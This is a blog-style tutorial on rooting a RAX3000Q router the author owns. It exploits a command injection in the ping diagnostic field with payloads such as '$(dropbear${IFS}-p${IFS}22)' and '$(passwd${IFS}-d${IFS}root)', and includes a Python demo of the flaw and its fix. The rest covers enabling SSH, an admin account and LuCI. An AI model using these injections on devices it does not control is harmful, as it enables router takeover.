Preface

A few days ago I bought a Dell server, but my home line is China Mobile and I could not get a public IP, so I planned to use IPv6 + DDNS to get a semi-public setup.

It then turned out that the router does not support DDNS, so I started looking for ways to flash a firmware or similar onto it.

Here is the prior work this builds on:

https://blog.imlk.top/posts/rax3000q-get-shell/

https://blog.noel-zhang.work/post/other/rax3000q-ssh-openwrt/

https://blog.noel-zhang.work/post/other/rax3000q-luci/

First, thanks to the authors of the articles above; by the time it reaches this author the tutorial has been through about four iterations.

The earlier articles contain a few gaps or bugs for various reasons, so please treat this article as the primary reference.

Getting root (command injection)

First log in to the admin UI (default username user, password on the label on the back of the router), then go to PC version -> Diagnostics -> Ping.

In the "URL or IP address" field enter $(id). The response comes back as ping: bad address 'uid=0(root) gid=0(root) groups=0(root)'

This tells us three things: the handler hands the field to a shell (an OS command injection), the web process runs as root, and $( ) command substitution is evaluated by that shell before ping ever sees the argument, which is why the output of id appears where an address should be.

The field has a length limit and rejects spaces, so ${IFS} is used in place of spaces (an unquoted ${IFS} expands to whitespace and the shell field-splits on it). Both checks are enforced only in the browser, so you can equally capture the request and resend it with the command written out in full.
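As an added example, not code from the original post or from the router firmware, here is the same pattern in Python: a stand-in handler that splices the field into a shell string (echo replaces ping, an assumption so it runs offline), a hardened handler that allow-lists the target and passes an argv list, and a helper that produces the ${IFS}-encoded payloads used in the Dropbear steps that follow. The form field name "url" in the replayed body is an assumption; the post does not give it.

```python
"""Command injection in a "ping this host" handler: vulnerable vs. hardened,
plus the ${IFS} encoding used to get past a front-end "no spaces" filter.
Added example; not the router firmware's code or the original post's."""
import re
import subprocess
from urllib.parse import quote


def vulnerable_ping_handler(target: str) -> str:
    # Mirrors the bug: the field is concatenated into a shell command line.
    # "echo" stands in for "ping" (assumption, so the example runs offline);
    # the shell still performs $(...) substitution before the command sees it.
    cmd = "echo ping -c 1 " + target
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True).stdout


# Allow-list: hostname / IPv4 / IPv6 characters only, no leading '-' so the
# value cannot be parsed as a ping option, no spaces or shell metacharacters.
_TARGET_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.:-]{0,252}$")


def hardened_ping_handler(target: str, validate: bool = True) -> str:
    # Two independent layers: (1) reject anything outside the allow-list;
    # (2) pass an argv list, so no shell ever sees the string. Layer 2 alone
    # already turns "$(id)" into a literal argument (try validate=False).
    if validate and not _TARGET_RE.match(target):
        raise ValueError(f"rejected target: {target!r}")
    argv = ["echo", "ping", "-c", "1", target]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def ifs_payload(command: str) -> str:
    # Wrap a command in $( ) and replace spaces with ${IFS}; an unquoted
    # ${IFS} expands to whitespace and the shell field-splits on it, so
    # "dropbear -p 22" and "dropbear${IFS}-p${IFS}22" run identically.
    if "\n" in command or "\t" in command:
        raise ValueError("only single-line, space-separated commands")
    return "$(" + command.replace(" ", "${IFS}") + ")"


def form_body(payload: str, field: str = "url") -> str:
    # Body for a replayed POST once the browser-side check is bypassed.
    # The real field name is not given in the post; "url" is an assumption.
    return field + "=" + quote(payload, safe="")


if __name__ == "__main__":
    print(vulnerable_ping_handler("$(id)").rstrip())               # id output where the address should be
    print(vulnerable_ping_handler(ifs_payload("id -u")).rstrip())  # still works with no literal space
    print(hardened_ping_handler("$(id)", validate=False).rstrip()) # stays literal: no shell involved
    print(form_body(ifs_payload("dropbear -p 22")))
    try:
        hardened_ping_handler("$(id)")
    except ValueError as e:
        print(e)
```

The two defensive layers are deliberately separate: the allow-list stops the payload at the door, and the argv list means that even a missed case (or a later code path that forgets to validate) never reaches a shell, so $( ) and ${IFS} are just characters in an argument.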

Dropbear

Dropbear is a relatively small SSH server and client, and is one of the SSH tools commonly used on routers and embedded Linux.

So we can first run $(dropbear${IFS}-p${IFS}22) through the ping field to start dropbear,

then $(passwd${IFS}-d${IFS}root) to remove root's password. This leaves root with an empty password on a LAN-facing SSH port, so once you are in, set a real one with passwd or switch dropbear to key-based authentication.

Then find the LAN IP on the "Status" page of the admin UI and connect over ssh; my LAN IP here is 192.168.1.4,

so the connection command is

ssh -p 22 root@192.168.1.4

(With port 22, -p 22 can be omitted, but root@ cannot: without it ssh tries your local username, and the login fails with a permission error.)

If nothing goes wrong you are in. What follows is some configuration: enabling the super account and other services.

First, edit dropbear's config file so that it starts at boot: vi /etc/config/dropbear

config dropbear
option PasswordAuth 'on'
option RootPasswordAuth 'on'
option Port '22'
option enable '1'

In vi, press i to enter insert mode, Esc to leave it, then type :wq to save the file.

Then run

/etc/init.d/dropbear enable
/etc/init.d/dropbear start

to finish the dropbear setup.

Then run the following to set up the super-admin account (the first command sets the login name, the second the password; "change-me" is a placeholder, use a password of your own):

mdlcfg -a SYS_SUPER_LOGIN_NAME="superadmin"
mdlcfg -a SYS_SUPER_LOGIN_PWD="change-me"

Then edit the startup script with vi /etc/init.d/tz_process_start

and delete the following two pieces: the if block, which on every boot wipes the super/senior login variables you just set (mdlcfg -g reads a key, -d deletes it, -c commits), and the fota_start.sh line, which launches the vendor's FOTA (firmware over-the-air) update process:

super_login_name=$(mdlcfg -g SYS_SUPER_LOGIN_NAME)
if [ -n "$super_login_name" ]; then
mdlcfg -d SYS_SUPER_LOGIN_NAME
mdlcfg -d SYS_SUPER_LOGIN_PWD
mdlcfg -d SYS_WEB_SUPER_PWD_RULE
mdlcfg -d SYS_SENIOR_LOGIN_NAME
mdlcfg -d SYS_SENIOR_LOGIN_PWD
mdlcfg -d SYS_WEB_SENIOR_PWD_RULE
mdlcfg -d SYS_WEB_SENIOR_PWD_HEAD
mdlcfg -c
fi
/bin/fota_start.sh restart >dev/null 2>&1 &

With that the SSH part is done: the router starts the SSH service at boot, and the super account you configured gets you into the admin UI with the more advanced functions unlocked.

Installing LuCI on the router

First run

ln -s /lib/ld-musl-arm.so.1 /lib/ld-musl-armhf.so.1

The reason (quoted directly from the earlier article):

The IPQ5018 is a dual-core Cortex-A53 processor. opkg's default architecture is ipq, but the OpenWrt feeds have no such architecture, so we need to pick a close one.

Judging from cpuinfo it should be armv7l with vfpv4 hardware floating point, but the built-in interpreter is /lib/ld-musl-arm.so.1, which only supports soft-float; this can be solved by creating a symlink.

Since the QSDK currently running is 32-bit, we cannot use the aarch64_cortex-a53 feed the way that article did; in the end I chose arm_cortex-a7_neon-vfpv4.

Next, add the following to /etc/opkg.conf:

arch all 1
arch noarch 1
arch ipq 10
arch arm_cortex-a7_neon-vfpv4 20

Then install the dependencies and related packages. The commands below originally come from the install list that the earlier author put together, but as of 2023 several of them returned 404 or failed on dependency errors,

so I added and swapped a few libraries here and got LuCI installed successfully.

!!! Note: run them one at a time, in order. Do not paste them in as a batch, to avoid dependency packages overwriting one another !!!

Two things worth knowing before you run them: the list mixes 18.06 and 21.02 packages, and each one is installed straight from a plain-http URL, which bypasses opkg's feed signature check entirely (it only covers the Packages index of a configured feed, never a bare .ipk URL). Both mirrors also serve https, so prefer that, and compare each file's SHA256 with the SHA256sum line in the Packages index that sits next to it in the same feed directory.

opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/packages-21.02/arm_cortex-a7_neon-vfpv4/base/libjson-script20210516_2021-05-16-b14c4688-2_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/packages-21.02/arm_cortex-a7_neon-vfpv4/base/uhttpd_2021-03-21-15346de8-2_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/base/lua_5.1.5-2_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-lib-nixio_git-20.356.64372-1259bb1-1_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-lib-ip_git-20.356.64372-1259bb1-1_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-lib-jsonc_git-20.356.64372-1259bb1-1_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/liblucihttp_2019-07-05-a34a17d5-1_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/liblucihttp-lua_2019-07-05-a34a17d5-1_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-base_git-20.356.64372-1259bb1-1_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-mod-admin-full_git-20.356.64372-1259bb1-1_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-theme-bootstrap_git-20.356.64372-1259bb1-1_all.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-proto-ppp_git-20.356.64372-1259bb1-1_all.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/packages-21.02/arm_cortex-a7_neon-vfpv4/base/libnl-tiny1_2020-08-05-c291088f-2_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/packages-21.02/arm_cortex-a7_neon-vfpv4/base/libubox20210516_2021-05-16-b14c4688-2_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/packages-21.02/arm_cortex-a7_neon-vfpv4/base/libuci20130104_2021-04-14-4b3db117-5_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/packages-21.02/arm_cortex-a7_neon-vfpv4/base/libubus20210630_2021-06-30-4fc532c8-2_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.ustc.edu.cn/openwrt/releases/21.02.0/packages/arm_cortex-a7_neon-vfpv4/base/libiwinfo-data_2022-08-19-0dad3e66-1_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.ustc.edu.cn/openwrt/releases/21.02.0/packages/arm_cortex-a7_neon-vfpv4/base/libiwinfo20210430_2022-08-19-0dad3e66-1_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/packages-21.02/arm_cortex-a7_neon-vfpv4/base/liblua5.1.5_5.1.5-9_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.ustc.edu.cn/openwrt/releases/21.02.0/packages/arm_cortex-a7_neon-vfpv4/base/libiwinfo-lua_2022-08-19-0dad3e66-1_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-proto-ipv6_git-20.356.64372-1259bb1-1_all.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/rpcd-mod-rrdns_20170710_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.ustc.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/base/firewall_2018-08-13-1c4d5bcd-3_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-app-firewall_git-20.356.64372-1259bb1-1_all.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/packages-21.02/arm_cortex-a7_neon-vfpv4/luci/luci-app-opkg_git-22.273.29015-e01e38c_all.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-proto-ppp_git-20.356.64372-1259bb1-1_all.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci_git-20.356.64372-1259bb1-1_all.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/packages-21.02/arm_cortex-a7_neon-vfpv4/base/libjson-c5_0.15-2_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/packages-21.02/arm_cortex-a7_neon-vfpv4/base/libblobmsg-json20210516_2021-05-16-b14c4688-2_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/packages-21.02/arm_cortex-a7_neon-vfpv4/base/rpcd_2022-02-19-8d26a1ba-1_arm_cortex-a7_neon-vfpv4.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-i18n-base-zh-cn_git-20.356.64372-1259bb1-1_all.ipk
opkg install http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.0/packages/arm_cortex-a7_neon-vfpv4/luci/luci-theme-material_git-20.356.64372-1259bb1-1_all.ipk
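An added example, not part of the original post: a check you can run on your PC (the QSDK firmware has no Python) before copying a downloaded .ipk to the router and running opkg install on the local file. It parses a feed's Packages index, the blank-line-separated stanzas with Package:, Filename:, Size: and SHA256sum: fields that OpenWrt publishes next to the .ipk files, and verifies the file's size and SHA256 against it. The stanza contents and the package bytes below are constructed for the demo and are not real feed metadata.

```python
"""Verify a downloaded .ipk against its feed's Packages index before
`opkg install ./file.ipk`. Added example, not part of the original post.
The index format (stanzas separated by blank lines, with Package:, Filename:,
Size:, SHA256sum: ...) is OpenWrt's; the values and the package bytes below
are constructed for the demo."""
import hashlib


def parse_packages_index(text: str) -> dict:
    """Map Filename -> {field: value} for every stanza in a Packages index."""
    entries, stanza = {}, {}
    for line in text.splitlines():
        if not line.strip():            # blank line ends a stanza
            if stanza:
                entries[stanza["Filename"]] = stanza
                stanza = {}
            continue
        if line[0] in " \t":            # continuation of a multi-line field
            continue
        key, _, value = line.partition(":")
        stanza[key.strip()] = value.strip()
    if stanza:                          # index without trailing blank line
        entries[stanza["Filename"]] = stanza
    return entries


def verify_ipk(index_text: str, filename: str, data: bytes) -> bool:
    """True iff the file is listed and both Size and SHA256sum match."""
    entry = parse_packages_index(index_text).get(filename)
    if entry is None:
        return False                    # not in the index: nothing to check against
    size_ok = int(entry["Size"]) == len(data)
    digest_ok = hashlib.sha256(data).hexdigest() == entry["SHA256sum"].lower()
    return size_ok and digest_ok


# --- constructed sample: not a real package, not real feed metadata ---
SAMPLE_IPK = b"constructed stand-in, not a real ipk archive\n"
SAMPLE_FILENAME = "uhttpd_2021-03-21-15346de8-2_arm_cortex-a7_neon-vfpv4.ipk"
SAMPLE_INDEX = (
    "Package: uhttpd\n"
    "Version: 2021-03-21-15346de8-2\n"
    "Architecture: arm_cortex-a7_neon-vfpv4\n"
    f"Filename: {SAMPLE_FILENAME}\n"
    f"Size: {len(SAMPLE_IPK)}\n"
    f"SHA256sum: {hashlib.sha256(SAMPLE_IPK).hexdigest()}\n"
    "Description:  uHTTPd is a tiny single threaded HTTP server\n"
    " (constructed continuation line)\n"
    "\n"
    "Package: lua\n"
    "Version: 5.1.5-2\n"
    "Architecture: arm_cortex-a7_neon-vfpv4\n"
    "Filename: lua_5.1.5-2_arm_cortex-a7_neon-vfpv4.ipk\n"
    "Size: 1\n"
    "SHA256sum: " + "0" * 64 + "\n"
)

if __name__ == "__main__":
    print(verify_ipk(SAMPLE_INDEX, SAMPLE_FILENAME, SAMPLE_IPK))           # genuine file
    print(verify_ipk(SAMPLE_INDEX, SAMPLE_FILENAME, SAMPLE_IPK + b"x"))    # tampered bytes
    print(verify_ipk(SAMPLE_INDEX, "not-listed.ipk", SAMPLE_IPK))         # unknown filename
```

In practice you fetch the Packages file from the same feed directory as the .ipk (the directory in each URL above, up to the last slash), download the .ipk, run the check, and only then copy the file to the router and install it from the local path. Size is checked as well as the digest because a truncated download fails fast and cheaply that way.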

After that, run the following:

uci -q delete uhttpd.main.listen_http
uci add_list uhttpd.main.listen_http="0.0.0.0:8080"
uci add_list uhttpd.main.listen_http="[::]:8080"
uci commit uhttpd
/etc/init.d/rpcd enable
/etc/init.d/uhttpd enable
/etc/init.d/rpcd start
/etc/init.d/uhttpd start

Finally, add the following to /etc/config/rpcd and restart rpcd so that it picks up the socket path:

config rpcd
option socket /var/run/ubus.sock
option timeout 30

Save and exit. You can now reach LuCI at http://<LAN IP>:8080. Note that 0.0.0.0 and [::] bind every interface and the UI is plain HTTP, so before relying on it either set listen_http to the LAN address (192.168.1.4:8080 in my case) or confirm that the firewall blocks port 8080 from the WAN side.

With that, both getting root over SSH and installing LuCI are done. Thanks again to the authors of the articles cited in this post.

Now I can go all out on DDNS.jpg

End of post. QED